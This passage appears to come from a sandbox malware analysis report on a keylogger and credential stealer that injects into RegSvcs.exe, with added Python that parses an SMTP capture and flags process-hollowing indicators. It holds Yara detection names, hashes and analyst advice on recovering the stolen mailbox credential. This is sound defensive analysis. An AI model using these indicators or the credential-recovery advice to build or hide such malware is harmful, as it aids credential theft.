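    ("S", "250-SIZE 52428800"),
    ("S", "250-8BITMIME"),
    ("S", "250-PIPELINING"),
    ("S", "250-PIPE_CONNECT"),
    ("S", "250-AUTH PLAIN LOGIN"),
    ("S", "250-STARTTLS"),
    ("S", "250 HELP"),
    ("C", "STARTTLS"),
    ("S", "220 TLS go ahead"),
]


@dataclass
class SmtpSession:
    banner: str = ""
    ehlo_name: str = ""
    server_greeting: str = ""
    extensions: dict = field(default_factory=dict)     # EHLO keyword -> parameters
    starttls_requested: bool = False
    starttls_accepted: bool = False
    cleartext_commands: list = field(default_factory=list)


def parse_session(lines):
    """Walk (direction, line) pairs in order; nothing after the TLS
    acceptance is cleartext, so nothing after it is expected."""
    s = SmtpSession()
    last_verb = None
    ehlo_first_line = False
    for who, text in lines:
        if who == "C":
            verb, _, arg = text.partition(" ")
            last_verb = verb.upper()
            s.cleartext_commands.append(last_verb)
            if last_verb == "EHLO":
                s.ehlo_name = arg.strip()
                ehlo_first_line = True
            elif last_verb == "STARTTLS":
                s.starttls_requested = True
            continue
        code, rest = text[:3], text[4:]                # "250-" and "250 " both 4 wide
        if not code.isdigit():
            continue
        if code == "220":
            if last_verb is None:
                s.banner = rest                        # greeting before any command
            elif last_verb == "STARTTLS":
                s.starttls_accepted = True             # TLS handshake follows
        elif code == "250" and last_verb == "EHLO":
            if ehlo_first_line:
                s.server_greeting = rest               # RFC 5321: domain + free text
                ehlo_first_line = False
            else:
                keyword, _, params = rest.partition(" ")
                s.extensions[keyword.upper()] = params.strip()
    return s


def ehlo_name_is_fqdn(name):
    """RFC 5321 expects a fully-qualified domain or an address literal."""
    if name.startswith("[") and name.endswith("]"):
        return True
    labels = name.split(".")
    return len(labels) > 1 and all(labels) and not name.replace(".", "").isdigit()


def indicators(s):
    out = []
    if not ehlo_name_is_fqdn(s.ehlo_name):
        out.append(f"EHLO argument {s.ehlo_name!r} is not a hostname; consistent "
                   "with a hard-coded or generated client identifier")
    if "STARTTLS" in s.extensions and s.starttls_accepted:
        out.append("STARTTLS accepted: AUTH, MAIL FROM, RCPT TO and DATA are "
                   "encrypted and absent from the cleartext capture")
    if "AUTH" in s.extensions:
        out.append(f"server offers AUTH {s.extensions['AUTH']}; the mailbox "
                   "credential is sent only inside TLS, so it must be recovered "
                   "from the sample, not from the pcap")
    return out


if __name__ == "__main__":
    session = parse_session(CAPTURED_SESSION)
    print("EHLO name:", session.ehlo_name, "| extensions:", sorted(session.extensions))
    for line in indicators(session):
        print("-", line)
```

The server echoes the sandbox's public address ("Hello 841618 [8.46.123.33]"), so the receiving mail server logs the victim's source IP even though the message body itself is invisible here; to get the account, recipient and message content, work from the sample's configuration or a memory dump of the injected process rather than from the network capture.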


                                                                              Target ID:0
                                                                              Start time:08:45:07
                                                                              Start date:09/10/2024
                                                                              Path:C:\Users\user\Desktop\7DI4iYwcvw.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\7DI4iYwcvw.exe"
                                                                              Imagebase:0x400000
                                                                              File size:1'257'083 bytes
                                                                              MD5 hash:E142F0BF6C0D9BE52F8C7F52007C64D0
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:08:45:13
                                                                              Start date:09/10/2024
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\7DI4iYwcvw.exe"
                                                                              Imagebase:0x470000
                                                                              File size:45'984 bytes
                                                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4794997601.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4794997601.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4794997601.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                              Reputation:high
                                                                              Has exited:false
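The two process records above carry the injection tell-tale in plain sight: Target ID 2 is RegSvcs.exe from the .NET Framework directory, yet its command line is the dropper's own path, and it is the process the Yara rules fire in, not the original image. The check below is an added example, not code from the report; it parses the records as key:value text (constructed here from the entries above, reduced to the fields the checks use) and flags the image/command-line mismatch, the use of a Microsoft .NET Framework utility as host, and in-memory Yara hits. A mismatch alone is a lead rather than proof, so it belongs next to the suspended-process and foreign-memory-write signatures the report lists, not in place of them.

```python
"""Flag process-hollowing indicators in sandbox process records.  Added
example; not part of the Joe Sandbox report."""
import ntpath

# Constructed from the two process records above; only the fields used by the
# checks are reproduced.
REPORT_TARGETS = r"""
Target ID:0
Path:C:\Users\user\Desktop\7DI4iYwcvw.exe
Commandline:"C:\Users\user\Desktop\7DI4iYwcvw.exe"
Imagebase:0x400000
Has exited:true

Target ID:2
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Commandline:"C:\Users\user\Desktop\7DI4iYwcvw.exe"
Imagebase:0x470000
Yara matches:
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown
Has exited:false
"""

DOTNET_FRAMEWORK_DIR = r"C:\Windows\Microsoft.NET\Framework"


def parse_targets(text):
    """One dict per 'Target ID' record; bullet lines are collected as a list
    under the key that precedes them (here 'Yara matches')."""
    records, current, last_key = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("•"):
            if not isinstance(current.get(last_key), list):
                current[last_key] = []
            current[last_key].append(line.lstrip("• ").strip())
            continue
        key, _, value = line.partition(":")       # first colon only: paths contain ':'
        if key == "Target ID":
            current = {}
            records.append(current)
        current[key] = value.strip()
        last_key = key
    return records


def image_from_cmdline(cmdline):
    """Executable token of a Windows command line, quoted or bare."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        return cmdline[1:cmdline.find('"', 1)]
    return cmdline.split(" ", 1)[0]


def assess(records):
    """Return {target_id: [finding, ...]} for records that deserve a look."""
    findings = {}
    for r in records:
        notes = []
        image = ntpath.basename(r["Path"]).lower()
        claimed = ntpath.basename(image_from_cmdline(r["Commandline"])).lower()
        if image != claimed:
            notes.append(f"image {image} runs with the command line of {claimed}: "
                         "typical of a suspended-process injection (hollowing)")
        if ntpath.normcase(r["Path"]).startswith(ntpath.normcase(DOTNET_FRAMEWORK_DIR)):
            notes.append("Microsoft .NET Framework utility used as host process")
        rules = r.get("Yara matches")
        if isinstance(rules, list) and rules:
            notes.append(f"{len(rules)} Yara rule(s) matched in process memory")
        if notes:
            findings[r["Target ID"]] = notes
    return findings


if __name__ == "__main__":
    for target_id, notes in assess(parse_targets(REPORT_TARGETS)).items():
        print(f"Target {target_id}:")
        for note in notes:
            print("  -", note)
```

The same comparison works on live telemetry (Sysmon event 1 or EDR process-start records expose both the image path and the command line), which is where this heuristic earns its keep: the dropper has exited, so only the RegSvcs.exe process is left to find on a host.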


                                                                                Execution Graph

                                                                                Execution Coverage:16.2%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:60%
                                                                                Total number of Nodes:55
                                                                                Total number of Limit Nodes:9
                                                                                execution_graph 20336 fde018 20337 fde024 20336->20337 20348 61b295a 20337->20348 20355 61b2968 20337->20355 20338 fde0c3 20361 61bde00 20338->20361 20365 61bddf1 20338->20365 20369 61bddff 20338->20369 20339 fde0e6 20373 61bfc68 20339->20373 20377 61bfc5e 20339->20377 20340 fde61f 20349 61b2928 20348->20349 20350 61b2962 20348->20350 20351 61b2a56 20350->20351 20381 61b9548 20350->20381 20387 61b992c 20350->20387 20393 61b9328 20350->20393 20351->20338 20356 61b298a 20355->20356 20357 61b2a56 20356->20357 20358 61b9548 2 API calls 20356->20358 20359 61b9328 LdrInitializeThunk 20356->20359 20360 61b992c 2 API calls 20356->20360 20357->20338 20358->20357 20359->20357 20360->20357 20362 61bde22 20361->20362 20363 61b9548 2 API calls 20362->20363 20364 61bdeec 20362->20364 20363->20364 20364->20339 20366 61bde70 20365->20366 20367 61b9548 2 API calls 20366->20367 20368 61bdeec 20366->20368 20367->20368 20368->20339 20370 61bde22 20369->20370 20371 61b9548 2 API calls 20370->20371 20372 61bdeec 20370->20372 20371->20372 20372->20339 20374 61bfc6a 20373->20374 20375 61b9548 2 API calls 20374->20375 20376 61bfd3a 20374->20376 20375->20376 20376->20340 20378 61bfc68 20377->20378 20379 61b9548 2 API calls 20378->20379 20380 61bfd3a 20378->20380 20379->20380 20380->20340 20383 61b9579 20381->20383 20382 61b96d9 20382->20351 20383->20382 20384 61b9924 LdrInitializeThunk 20383->20384 20386 61b9328 LdrInitializeThunk 20383->20386 20384->20382 20386->20383 20388 61b97e3 20387->20388 20390 61b9924 LdrInitializeThunk 20388->20390 20392 61b9328 LdrInitializeThunk 20388->20392 20391 61b9a81 20390->20391 20391->20351 20392->20388 20394 61b933a 20393->20394 20396 61b933f 20393->20396 20394->20351 20395 61b9a69 LdrInitializeThunk 20395->20394 20396->20394 20396->20395 20397 61b9c70 20398 61b9c9d 20397->20398 20399 61b9328 LdrInitializeThunk 20398->20399 20400 61bbb7f 20398->20400 20402 61b9fa6 20398->20402 
20399->20402 20401 61b9328 LdrInitializeThunk 20401->20402 20402->20400 20402->20401
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: N
                                                                                • API String ID: 0-1130791706
                                                                                • Opcode ID: be8df61d1601c7ad29a625f0832d783c1ce9dba8079048430c21b5fd1118a412
                                                                                • Instruction ID: 86bb489251525c0e3ad454deb7b882ab6eef12b724b836d5de422a29d3da3d1d
                                                                                • Opcode Fuzzy Hash: be8df61d1601c7ad29a625f0832d783c1ce9dba8079048430c21b5fd1118a412
                                                                                • Instruction Fuzzy Hash: B073F431D10B5A8EDB11EF68C844AD9F7B1FF99300F51D69AE44867261EB70AAC4CF81
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: K
                                                                                • API String ID: 0-856455061
                                                                                • Opcode ID: 745a2c45cb3abc32944efd22f3128f75db1646f9303be9ac87d86048ffd47f1a
                                                                                • Instruction ID: 44a4563d5a1842710f070f47c71902d33dbe40bb4971011926c75b60f9270305
                                                                                • Opcode Fuzzy Hash: 745a2c45cb3abc32944efd22f3128f75db1646f9303be9ac87d86048ffd47f1a
                                                                                • Instruction Fuzzy Hash: 9D33E130C146198ADB61EF68C884ADDF7B1FF99300F50D69AE45C67261EB70AAC5CF81

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 974 61b9548-61b9577 975 61b9579 974->975 976 61b957e-61b9614 974->976 975->976 978 61b96b3-61b96b9 976->978 979 61b9619-61b962c 978->979 980 61b96bf-61b96d7 978->980 981 61b962e 979->981 982 61b9633-61b9684 979->982 983 61b96eb-61b96fe 980->983 984 61b96d9-61b96e6 980->984 981->982 1000 61b9697-61b96a9 982->1000 1001 61b9686-61b9694 982->1001 986 61b9700 983->986 987 61b9705-61b9721 983->987 985 61b9a81-61b9b7e 984->985 992 61b9b80-61b9b85 985->992 993 61b9b86-61b9b90 985->993 986->987 990 61b9728-61b974c 987->990 991 61b9723 987->991 997 61b974e 990->997 998 61b9753-61b9785 990->998 991->990 992->993 997->998 1006 61b978c-61b97ce 998->1006 1007 61b9787 998->1007 1003 61b96ab 1000->1003 1004 61b96b0 1000->1004 1001->980 1003->1004 1004->978 1009 61b97d0 1006->1009 1010 61b97d5-61b97de 1006->1010 1007->1006 1009->1010 1011 61b9a06-61b9a0c 1010->1011 1012 61b97e3-61b9808 1011->1012 1013 61b9a12-61b9a25 1011->1013 1014 61b980a 1012->1014 1015 61b980f-61b9846 1012->1015 1016 61b9a2c-61b9a47 1013->1016 1017 61b9a27 1013->1017 1014->1015 1025 61b9848 1015->1025 1026 61b984d-61b987f 1015->1026 1018 61b9a49 1016->1018 1019 61b9a4e-61b9a62 1016->1019 1017->1016 1018->1019 1023 61b9a69-61b9a7f LdrInitializeThunk 1019->1023 1024 61b9a64 1019->1024 1023->985 1024->1023 1025->1026 1028 61b98e3-61b98f6 1026->1028 1029 61b9881-61b98a6 1026->1029 1032 61b98f8 1028->1032 1033 61b98fd-61b9922 1028->1033 1030 61b98a8 1029->1030 1031 61b98ad-61b98db 1029->1031 1030->1031 1031->1028 1032->1033 1036 61b9931-61b9969 1033->1036 1037 61b9924-61b9925 1033->1037 1038 61b996b 1036->1038 1039 61b9970-61b99d1 call 61b9328 1036->1039 1037->1013 1038->1039 1045 61b99d8-61b99fc 1039->1045 1046 61b99d3 1039->1046 1049 61b99fe 1045->1049 1050 61b9a03 1045->1050 1046->1045 1049->1050 1050->1011
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fc528d51304031b3b082c89d789c67caa4159c3b4fe16e8e2ade549faf114305
                                                                                • Instruction ID: 501c1280cf20b13d33f4ba3d3d791fdc5dbcc536ec5d524215837040ceb230d3
                                                                                • Opcode Fuzzy Hash: fc528d51304031b3b082c89d789c67caa4159c3b4fe16e8e2ade549faf114305
                                                                                • Instruction Fuzzy Hash: 82F1F474E00218CFDB54DFA9C884B9DFBB2BF89304F5485A9E848AB355DB349986CF50
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: K
                                                                                • API String ID: 0-856455061
                                                                                • Opcode ID: 57605626815ee02f5d5b6fe76af7f7a29c4abb9745380897b83f3fd782e745c6
                                                                                • Instruction ID: a6ca8e685f77eccaa861680733f2b1bbfac573b9f167d22765213247b9a680a0
                                                                                • Opcode Fuzzy Hash: 57605626815ee02f5d5b6fe76af7f7a29c4abb9745380897b83f3fd782e745c6
                                                                                • Instruction Fuzzy Hash: 73C13670D046188FDB55DF69C8847DDBBF1EF89300F14D6AAE048AB261EB74AA85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d9e8423dff494798824a3aef6b04479a3c0ae19ce521be775200432fa30fd229
                                                                                • Instruction ID: cf6fe6eecc85958f30c5057e49bbdd74df61fbf0a28375ad652d223babe79f7d
                                                                                • Opcode Fuzzy Hash: d9e8423dff494798824a3aef6b04479a3c0ae19ce521be775200432fa30fd229
                                                                                • Instruction Fuzzy Hash: 28827D31A00209DFCB15CFA8C984AAEBBF2FF88310F19865AE4059B361D735ED51DB56

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2016 61b0b30-61b0b50 2017 61b0b52 2016->2017 2018 61b0b57-61b0bd9 2016->2018 2017->2018 2020 61b0c3e-61b0c54 2018->2020 2021 61b0bdb-61b0be4 2020->2021 2022 61b0c56-61b0ca0 2020->2022 2023 61b0beb-61b0c34 2021->2023 2024 61b0be6 2021->2024 2029 61b0d0b-61b0d0c 2022->2029 2030 61b0ca2-61b0ce3 2022->2030 2031 61b0c3b 2023->2031 2032 61b0c36 2023->2032 2024->2023 2033 61b0d0d-61b0d3e 2029->2033 2038 61b0d05-61b0d06 2030->2038 2039 61b0ce5-61b0d03 2030->2039 2031->2020 2032->2031 2037 61b0d45-61b0dac 2033->2037 2045 61b16fe-61b1733 2037->2045 2046 61b0db2-61b0dd3 2037->2046 2040 61b0d07-61b0d09 2038->2040 2039->2040 2040->2033 2049 61b16db-61b16f7 2046->2049 2050 61b0dd8-61b0de1 2049->2050 2051 61b16fd 2049->2051 2052 61b0de8-61b0e4e 2050->2052 2053 61b0de3 2050->2053 2051->2045 2057 61b0e50 2052->2057 2058 61b0e55-61b0edf 2052->2058 2053->2052 2057->2058 2064 61b0ef1-61b0ef8 2058->2064 2065 61b0ee1-61b0ee8 2058->2065 2066 61b0efa 2064->2066 2067 61b0eff-61b0f0c 2064->2067 2068 61b0eea 2065->2068 2069 61b0eef 2065->2069 2066->2067 2070 61b0f0e 2067->2070 2071 61b0f13-61b0f1a 2067->2071 2068->2069 2069->2067 2070->2071 2072 61b0f1c 2071->2072 2073 61b0f21-61b0f78 2071->2073 2072->2073 2076 61b0f7a 2073->2076 2077 61b0f7f-61b0f96 2073->2077 2076->2077 2078 61b0f98-61b0f9f 2077->2078 2079 61b0fa1-61b0fa9 2077->2079 2080 61b0faa-61b0fb4 2078->2080 2079->2080 2081 61b0fbb-61b0fc4 2080->2081 2082 61b0fb6 2080->2082 2083 61b16ab-61b16b1 2081->2083 2082->2081 2084 61b0fc9-61b0fd5 2083->2084 2085 61b16b7-61b16d1 2083->2085 2086 61b0fdc-61b0fe1 2084->2086 2087 61b0fd7 2084->2087 2092 61b16d8 2085->2092 2093 61b16d3 2085->2093 2089 61b0fe3-61b0fef 2086->2089 2090 61b1024-61b1026 2086->2090 2087->2086 2094 61b0ff1 2089->2094 2095 61b0ff6-61b0ffb 2089->2095 2091 61b102c-61b1040 2090->2091 2096 61b1689-61b1696 2091->2096 2097 61b1046-61b105b 2091->2097 2092->2049 2093->2092 2094->2095 
2095->2090 2098 61b0ffd-61b100a 2095->2098 2103 61b1697-61b16a1 2096->2103 2101 61b105d 2097->2101 2102 61b1062-61b10e8 2097->2102 2099 61b100c 2098->2099 2100 61b1011-61b1022 2098->2100 2099->2100 2100->2091 2101->2102 2110 61b10ea-61b1110 2102->2110 2111 61b1112 2102->2111 2104 61b16a8 2103->2104 2105 61b16a3 2103->2105 2104->2083 2105->2104 2112 61b111c-61b113c 2110->2112 2111->2112 2114 61b12bb-61b12c0 2112->2114 2115 61b1142-61b114c 2112->2115 2118 61b12c2-61b12e2 2114->2118 2119 61b1324-61b1326 2114->2119 2116 61b114e 2115->2116 2117 61b1153-61b117c 2115->2117 2116->2117 2121 61b117e-61b1188 2117->2121 2122 61b1196-61b1198 2117->2122 2132 61b130c 2118->2132 2133 61b12e4-61b130a 2118->2133 2120 61b132c-61b134c 2119->2120 2123 61b1683-61b1684 2120->2123 2124 61b1352-61b135c 2120->2124 2126 61b118a 2121->2126 2127 61b118f-61b1195 2121->2127 2128 61b1237-61b1246 2122->2128 2131 61b1685-61b1687 2123->2131 2129 61b135e 2124->2129 2130 61b1363-61b138c 2124->2130 2126->2127 2127->2122 2134 61b1248 2128->2134 2135 61b124d-61b1252 2128->2135 2129->2130 2138 61b138e-61b1398 2130->2138 2139 61b13a6-61b13b4 2130->2139 2131->2103 2140 61b1316-61b1322 2132->2140 2133->2140 2134->2135 2136 61b127c-61b127e 2135->2136 2137 61b1254-61b1264 2135->2137 2143 61b1284-61b1298 2136->2143 2141 61b126b-61b127a 2137->2141 2142 61b1266 2137->2142 2144 61b139a 2138->2144 2145 61b139f-61b13a5 2138->2145 2146 61b1453-61b1462 2139->2146 2140->2120 2141->2143 2142->2141 2148 61b129e-61b12b6 2143->2148 2149 61b119d-61b11b8 2143->2149 2144->2145 2145->2139 2150 61b1469-61b146e 2146->2150 2151 61b1464 2146->2151 2148->2131 2152 61b11ba 2149->2152 2153 61b11bf-61b1229 2149->2153 2154 61b1498-61b149a 2150->2154 2155 61b1470-61b1480 2150->2155 2151->2150 2152->2153 2172 61b122b 2153->2172 2173 61b1230-61b1236 2153->2173 2156 61b14a0-61b14b4 2154->2156 2157 61b1482 2155->2157 2158 61b1487-61b1496 2155->2158 2159 61b14ba-61b1523 2156->2159 2160 61b13b9-61b13d4 2156->2160 2157->2158 2158->2156 2170 
61b152c-61b167f 2159->2170 2171 61b1525-61b1527 2159->2171 2162 61b13db-61b1445 2160->2162 2163 61b13d6 2160->2163 2177 61b144c-61b1452 2162->2177 2178 61b1447 2162->2178 2163->2162 2174 61b1680-61b1681 2170->2174 2171->2174 2172->2173 2173->2128 2174->2085 2177->2146 2178->2177
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d406cb2efabddff54f1614c8ec5e270b0946c76e19eb5064713635c9e8dea07c
                                                                                • Instruction ID: 94d555a12e32fa131607745d61a0c0fffea26427b3853e2a5362b5015c8d8f97
                                                                                • Opcode Fuzzy Hash: d406cb2efabddff54f1614c8ec5e270b0946c76e19eb5064713635c9e8dea07c
                                                                                • Instruction Fuzzy Hash: A872CE74E012288FEB64DF69C890BEDBBB2BB49304F1495E9D409A7355EB349E81CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7d7ce4574a05eb77e9e35ffb092c1840385a77e81eafaea26e80d0754d154f67
                                                                                • Instruction ID: a5fb94039b729b2d777b6653243a1312f287259291a5688d34201c59057984a2
                                                                                • Opcode Fuzzy Hash: 7d7ce4574a05eb77e9e35ffb092c1840385a77e81eafaea26e80d0754d154f67
                                                                                • Instruction Fuzzy Hash: 97129070A002199FDB14DF69C854BAEBBF3BF88710F24856AE405EB395EB349D41DB90

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 3691 fd6fc8-fd6ffe 3822 fd7000 call fd7118 3691->3822 3823 fd7000 call fd6fc8 3691->3823 3824 fd7000 call fd69a0 3691->3824 3692 fd7006-fd700c 3693 fd705c-fd7060 3692->3693 3694 fd700e-fd7012 3692->3694 3695 fd7077-fd708b 3693->3695 3696 fd7062-fd7071 3693->3696 3697 fd7014-fd7019 3694->3697 3698 fd7021-fd7028 3694->3698 3703 fd7093-fd709a 3695->3703 3819 fd708d call fda0e8 3695->3819 3820 fd708d call fda088 3695->3820 3821 fd708d call fd9dd0 3695->3821 3701 fd709d-fd70a7 3696->3701 3702 fd7073-fd7075 3696->3702 3697->3698 3699 fd70fe-fd713b 3698->3699 3700 fd702e-fd7035 3698->3700 3713 fd713d-fd7143 3699->3713 3714 fd7146-fd7166 3699->3714 3700->3693 3704 fd7037-fd703b 3700->3704 3705 fd70a9-fd70af 3701->3705 3706 fd70b1-fd70b5 3701->3706 3702->3703 3707 fd703d-fd7042 3704->3707 3708 fd704a-fd7051 3704->3708 3710 fd70bd-fd70f7 3705->3710 3706->3710 3711 fd70b7 3706->3711 3707->3708 3708->3699 3712 fd7057-fd705a 3708->3712 3710->3699 3711->3710 3712->3703 3713->3714 3720 fd716d-fd7174 3714->3720 3721 fd7168 3714->3721 3722 fd7176-fd7181 3720->3722 3723 fd74fc-fd7505 3721->3723 3724 fd750d-fd753a 3722->3724 3725 fd7187-fd719a 3722->3725 3730 fd719c-fd71aa 3725->3730 3731 fd71b0-fd71cb 3725->3731 3730->3731 3737 fd7484-fd748b 3730->3737 3738 fd71cd-fd71d3 3731->3738 3739 fd71ef-fd71f2 3731->3739 3737->3723 3744 fd748d-fd748f 3737->3744 3742 fd71dc-fd71df 3738->3742 3743 fd71d5 3738->3743 3740 fd734c-fd7352 3739->3740 3741 fd71f8-fd71fb 3739->3741 3745 fd743e-fd7441 3740->3745 3746 fd7358-fd735d 3740->3746 3741->3740 3747 fd7201-fd7207 3741->3747 3748 fd7212-fd7218 3742->3748 3749 fd71e1-fd71e4 3742->3749 3743->3740 3743->3742 3743->3745 3743->3748 3750 fd749e-fd74a4 3744->3750 3751 fd7491-fd7496 3744->3751 3754 fd7508 3745->3754 3755 fd7447-fd744d 3745->3755 3746->3745 3747->3740 3753 fd720d 3747->3753 3756 fd721e-fd7220 3748->3756 3757 fd721a-fd721c 3748->3757 3758 
fd727e-fd7284 3749->3758 3759 fd71ea 3749->3759 3750->3724 3752 fd74a6-fd74ab 3750->3752 3751->3750 3760 fd74ad-fd74b2 3752->3760 3761 fd74f0-fd74f3 3752->3761 3753->3745 3754->3724 3763 fd744f-fd7457 3755->3763 3764 fd7472-fd7476 3755->3764 3765 fd722a-fd7233 3756->3765 3757->3765 3758->3745 3762 fd728a-fd7290 3758->3762 3759->3745 3760->3754 3766 fd74b4 3760->3766 3761->3754 3773 fd74f5-fd74fa 3761->3773 3767 fd7296-fd7298 3762->3767 3768 fd7292-fd7294 3762->3768 3763->3724 3769 fd745d-fd746c 3763->3769 3764->3737 3772 fd7478-fd747e 3764->3772 3770 fd7235-fd7240 3765->3770 3771 fd7246-fd726e 3765->3771 3774 fd74bb-fd74c0 3766->3774 3775 fd72a2-fd72b9 3767->3775 3768->3775 3769->3731 3769->3764 3770->3745 3770->3771 3793 fd7274-fd7279 3771->3793 3794 fd7362-fd7398 3771->3794 3772->3722 3772->3737 3773->3723 3773->3744 3776 fd74e2-fd74e4 3774->3776 3777 fd74c2-fd74c4 3774->3777 3787 fd72bb-fd72d4 3775->3787 3788 fd72e4-fd730b 3775->3788 3776->3754 3784 fd74e6-fd74e9 3776->3784 3781 fd74c6-fd74cb 3777->3781 3782 fd74d3-fd74d9 3777->3782 3781->3782 3782->3724 3786 fd74db-fd74e0 3782->3786 3784->3761 3786->3776 3789 fd74b6-fd74b9 3786->3789 3787->3794 3797 fd72da-fd72df 3787->3797 3788->3754 3799 fd7311-fd7314 3788->3799 3789->3754 3789->3774 3793->3794 3800 fd739a-fd739e 3794->3800 3801 fd73a5-fd73ad 3794->3801 3797->3794 3799->3754 3802 fd731a-fd7343 3799->3802 3803 fd73bd-fd73c1 3800->3803 3804 fd73a0-fd73a3 3800->3804 3801->3754 3805 fd73b3-fd73b8 3801->3805 3802->3794 3817 fd7345-fd734a 3802->3817 3806 fd73e0-fd73e4 3803->3806 3807 fd73c3-fd73c9 3803->3807 3804->3801 3804->3803 3805->3745 3810 fd73ee-fd740d call fd76f1 3806->3810 3811 fd73e6-fd73ec 3806->3811 3807->3806 3809 fd73cb-fd73d3 3807->3809 3809->3754 3812 fd73d9-fd73de 3809->3812 3814 fd7413-fd7417 3810->3814 3811->3810 3811->3814 3812->3745 3814->3745 3815 fd7419-fd7435 3814->3815 3815->3745 3817->3794 3819->3703 3820->3703 3821->3703 3822->3692 3823->3692 3824->3692
Memory Dump Source
• Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7274194d24389c09d38cddbf3c2fd4d5d8050143ac56879d8b36958b276cf03b
• Instruction ID: 441f1b5e11d8125009da0c7e4f7a29759d55816875e12c3fda5d718390a30f8b
• Opcode Fuzzy Hash: 7274194d24389c09d38cddbf3c2fd4d5d8050143ac56879d8b36958b276cf03b
• Instruction Fuzzy Hash: 1B024F31A04215DFCB15EF68D844AAEBBF3BF49310F19846AE805AB361E734ED41EB51

Control-flow Graph
